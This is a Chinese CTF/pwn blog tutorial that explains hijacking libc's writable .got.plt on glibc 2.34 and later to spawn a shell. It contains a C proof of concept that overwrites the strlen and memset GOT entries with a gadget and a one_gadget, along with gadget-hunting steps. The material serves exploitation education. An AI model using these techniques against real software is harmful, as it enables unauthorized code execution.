<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  <meta name="baidu-site-verification" content="codeva-0Qx7wvY9gP" />
  
  <title>『hijack_libc_got』劫持libc的got表getshell | C_LBY&#39;s BLOG</title>
  <meta name="author" content="鎏柏鱼">
  
  <meta name="description" content="一种劫持libc的got表getshell的方法">
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="『hijack_libc_got』劫持libc的got表getshell"/>
  <meta property="og:site_name" content="C_LBY&#39;s BLOG"/>

  
    <meta property="og:image" content=""/>
  

  
    <link rel="alternative" href="/atom.xml" title="C_LBY&#39;s BLOG" type="application/atom+xml">
  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  




<meta name="generator" content="Hexo 6.3.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">C_LBY&#39;s BLOG</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class="fa fa-archive"></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/categories" title="All the categories.">
			  <i class="fa fa-folder"></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class="fa fa-tags"></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/diary" title="fashion little junk">
			  <i class="fa fa-tasks"></i>Diary
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class="fa fa-user"></i>About
			</a>
		  </li>
		  
		  <li>
			<a href="/atom.xml" title="Subscribe me.">
			  <i class="fa fa-rss"></i>RSS
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> 『hijack_libc_got』劫持libc的got表getshell</h1>
		</div>
	



	<div class="row post">
		<!-- cols -->
		
			<div id="top_meta"></div>
			<div class="col-md-9">
				

							<!-- content -->
							<div class="mypage">
								
									<div class="alert alert-success description">
										<i class="fa fa-info-circle"></i> 一种劫持libc的got表getshell的方法
									</div> <!-- alert -->
									

										<h3 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h3><p>在glibc2.34或更高版本，没有了hook用来劫持，所以一般会用IO之类的路子来劫持。如果条件允许，还可以考虑劫持劫持libc的got表来getshell。libc一般是partial relro，所以got表可写。但准确来说，接下来的PoC，其实针对的是劫持.got.plt段执行one gadget而设计的。劫持libcgot的技术还可以结合context的gadget实现rop，后面再深入研究。</p>
<h3 id="0x01-PoC"><a href="#0x01-PoC" class="headerlink" title="0x01 PoC"></a>0x01 PoC</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;stdio.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;stdlib.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;stdint.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;string.h&quot;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&quot;unistd.h&quot;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// 模拟泄露libc</span></span><br><span class="line">    <span class="type">uint64_t</span> libc_base = &amp;<span class="built_in">printf</span> - <span class="number">0x606F0</span>;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;libc_base = %p\n&quot;</span>, libc_base);</span><br><span class="line"></span><br><span class="line">    <span class="type">uint64_t</span> gadget = libc_base + <span class="number">0xb1788</span>;</span><br><span class="line">    <span class="type">uint64_t</span> ogg = libc_base + <span class="number">0xebc88</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 修改j_strlen</span></span><br><span class="line">    <span class="type">uint64_t</span> j_strlen = libc_base + <span class="number">0x21A098</span>;</span><br><span class="line">    *((<span class="type">uint64_t</span> *)j_strlen) = gadget;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 修改j_memset</span></span><br><span class="line">    <span class="type">uint64_t</span> j_memset = libc_base + <span class="number">0x21A188</span>;</span><br><span class="line">    *((<span class="type">uint64_t</span> *)j_memset) = ogg;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// getshell</span></span><br><span class="line">    fflush(<span class="built_in">stdout</span>);</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;getshell&quot;</span>);</span><br><span class="line">    _exit(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://c-lby.top/images/hijack_libc_got/PoC%E8%BF%90%E8%A1%8C%E7%BB%93%E6%9E%9C.png" alt="PoC运行结果"></p>
<h3 id="0x02-分析"><a href="#0x02-分析" class="headerlink" title="0x02 分析"></a>0x02 分析</h3><h5 id="puts函数的跟进"><a href="#puts函数的跟进" class="headerlink" title="puts函数的跟进"></a>puts函数的跟进</h5><p>PoC最后执行了一个puts函数，并且直接_exit，没法劫持exit_hook。我们去IDA翻一翻puts函数都干了些什么。<img src="https://c-lby.top/images/hijack_libc_got/puts_ida.png" alt="puts_ida"></p>
<p>发现它调用了j_strlen函数，我们跟进看看。<img src="https://c-lby.top/images/hijack_libc_got/j_strlen%E5%9C%A8pltsec%E6%AE%B5.png" alt="j_strlen在pltsec段"></p>
<p>继续跟进<img src="https://c-lby.top/images/hijack_libc_got/j_strlen%E5%9C%A8gotplt%E6%AE%B5.png" alt="j_strlen在gotplt段"></p>
<p>发现最后来到了.got.plt段。这是一个可读可写的段，所以我们可以通过劫持这个strlen的内容为one gadget，让程序执行到puts的时候，调用的是ogg，从而getshell。</p>
<h5 id="got-plt段函数的规律"><a href="#got-plt段函数的规律" class="headerlink" title=".got.plt段函数的规律"></a>.got.plt段函数的规律</h5><p>这里我们可以发现一个规律：<img src="https://c-lby.top/images/hijack_libc_got/gotplt%E6%AE%B5.png" alt="gotplt段"></p>
<p>不难发现这些函数大部分都指向.plt.sec段，并且命名都有<code>j_</code>开头。那么在实际做题的时候思路就很清晰了，我们可以去找我们要劫持的函数会不会调用到这样命名的函数，有的话就有机会通过劫持got表getshell。</p>
<h5 id="劫持strlen后无法getshell"><a href="#劫持strlen后无法getshell" class="headerlink" title="劫持strlen后无法getshell"></a>劫持strlen后无法getshell</h5><p>PoC中我并没有直接将strlen劫持为ogg，因为直接劫持是没办法getshell的。下面用一道其他题目的调试过程来展示这一点。</p>
<p>我们先来看ogg：<img src="https://c-lby.top/images/hijack_libc_got/ogg.png" alt="ogg"></p>
<p>PoC中我们选择的是0xebc88，也就是说我们要让rsi和rdx都为NULL的情况下，这个ogg才能正常getshell。但是我们运行脚本会发现程序炸了，调试观察看住的地方，发现此时rdx并不为零。<img src="https://c-lby.top/images/hijack_libc_got/ogg%E6%9D%A1%E4%BB%B6%E4%B8%8D%E6%BB%A1%E8%B6%B3.png" alt="ogg条件不满足"></p>
<p>那么我们就要想办法使rdx为0。当然这里调整ogg条件的方法不止一种，毕竟ogg不止这一个，还可以通过调栈的方法满足条件，这个具体视题目条件而定。</p>
<h5 id="调整寄存器状态满足ogg条件"><a href="#调整寄存器状态满足ogg条件" class="headerlink" title="调整寄存器状态满足ogg条件"></a>调整寄存器状态满足ogg条件</h5><p>回到这里，其实PoC的情况和上述情况差不多，也是rdx不为0导致的程序出错。解决思路是，找到形如<code>mov rdx , rsi; call xxx</code>这样的gadget，将其地址写入到strlen的got中，然后在xxx的got表中写入ogg地址。我们用<code>ropper -f libc.so.6 -search &quot;mov rdx, rsi&quot;</code>找一下gadget。<img src="https://c-lby.top/images/hijack_libc_got/gadget.png" alt="gadget"></p>
<p>发现有两条符合的gadget，但是上面那个gadget会导致rsi被改变为2，所以不能用。所以我们将0xb1788的gadget写到strlen的got中。在IDA中查看一下0x28670处，发现是memset的.plt.sec，因此我们只要将memset的got表改为ogg即可。顺带一提，下面那个gadget是<code>explicit_bzero</code>函数中的。</p>
<p><img src="https://c-lby.top/images/hijack_libc_got/gadget%E5%87%BA%E5%A4%84.png" alt="gadget出处"></p>
<p>于是就有了PoC那样的劫持步骤。</p>
<p>总结一下：</p>
<ol>
<li>泄露libc地址</li>
<li>劫持<code>strlen</code>的got表，写入<code>explicit_bzero</code>的gadget</li>
<li>劫持<code>memset</code>的got表，写入one gadget</li>
<li>执行puts函数getshell</li>
</ol>
<p>实际题目中，我们要劫持的函数不一定是puts函数，可以是<code>stack_chk_fail</code>或者其他的，只要调用了got表函数，能满足ogg条件，都能劫持。甚至为了满足ogg条件，可以凑一条调用链出来。</p>

											<div class="article-footer-copyright">

    本博客采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank">知识共享署名-非商业性使用-相同方式共享 4.0
        国际许可协议(CC BY-NC-SA 4.0) 发布.</a></br>
    因本人技术水平和知识面有限, 内容如有纰漏或者需要修正的地方, 欢迎大家指正。转载请注明来自<a href="https://c-lby.github.io" target="_blank">C_LBY's blog</a>！
</div>
							</div>

							
									
										<span data-path="/2024/06/25/hijack-libc-got/">
											<em class="post-meta-item-text"> Page View <i
													class="waline-pageview-count"></i></em>
										</span>

										
											<div>
												<center>

													<div class="pagination">

    
    
    <a href="/2024/06/25/ret2dl-hijack-l-addr/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> 上一页</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2024/06/11/first-docker/" type="button" class="btn btn-default ">下一页<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


												</center>
											</div>

											<!-- comment -->
											<!--
<section id="comment">
    <h2 class="title">留言</h2>

    
</section>

-->
											
													
														<section id="comments" class="comments">
															<!-- <link rel="stylesheet" href="https://unpkg.com/@waline/client@v2/dist/waline.css" />
<div id="waline"></div>
<script type="module">
  import { init } from 'https://unpkg.com/@waline/client@v2/dist/waline.mjs';
  var walineConfig = 
    walineConfig.el='#waline';
  Waline.init(walineConfig);
</script> -->

<link rel="stylesheet" href="https://unpkg.com/@waline/client@v2/dist/waline.css" />
<div id="waline"></div>
<script type="module">
  import { init } from 'https://unpkg.com/@waline/client@v2/dist/waline.mjs';

  init({
    enable: true,
    el: '#waline',
    serverURL: 'https://blog-s-comment-three.vercel.app',
    dark: true,
    pageview: true,
    lang: 'zh-CN',
    requiredMeta: ['nick', 'mail'],
    locale:
      { placeholder: 'Say something……' },
    highlighter: true,
    search: false,
    emoji: [
      '//unpkg.com/@waline/emojis@1.2.0/weibo',
      '//unpkg.com/@waline/emojis@1.2.0/bmoji',
      '//unpkg.com/@waline/emojis@1.2.0/bilibili',
      'https://unpkg.com/@waline/emojis@1.2.0/qq',
    ],
    imageUploader: false,
  });
</script>
														</section>
														
															
					</div> <!-- col-md-9/col-md-12 -->


					
						<div id="side_meta">
							<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2024-06-25 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="/categories/hijack-libc-got/">hijack_libc_got<span>1</span></a></li>
  </li>

    </ul>
	</div>
	

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/CTF/">CTF<span>18</span></a></li> <li><a href="/tags/PWN/">PWN<span>21</span></a></li> <li><a href="/tags/libc-got/">libc_got<span>1</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#0x00-%E5%89%8D%E8%A8%80"><span class="toc-article-text">0x00 前言</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#0x01-PoC"><span class="toc-article-text">0x01 PoC</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#0x02-%E5%88%86%E6%9E%90"><span class="toc-article-text">0x02 分析</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#puts%E5%87%BD%E6%95%B0%E7%9A%84%E8%B7%9F%E8%BF%9B"><span class="toc-article-text">puts函数的跟进</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#got-plt%E6%AE%B5%E5%87%BD%E6%95%B0%E7%9A%84%E8%A7%84%E5%BE%8B"><span class="toc-article-text">.got.plt段函数的规律</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E5%8A%AB%E6%8C%81strlen%E5%90%8E%E6%97%A0%E6%B3%95getshell"><span class="toc-article-text">劫持strlen后无法getshell</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E8%B0%83%E6%95%B4%E5%AF%84%E5%AD%98%E5%99%A8%E7%8A%B6%E6%80%81%E6%BB%A1%E8%B6%B3ogg%E6%9D%A1%E4%BB%B6"><span class="toc-article-text">调整寄存器状态满足ogg条件</span></a></li></ol></li></ol></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->



						</div>

						

			</div><!-- row -->

			<!--
 -->
	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
    &copy; 2024
      鎏柏鱼's Blog
        
                powered by <a href="http://hexo.io/" target="_blank">Hexo</a> | Theme by <a
                  href="https://github.com/Ares-X/hexo-theme-freemind.bithack" target="_blank">freemind.bithack</a>
</p> </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
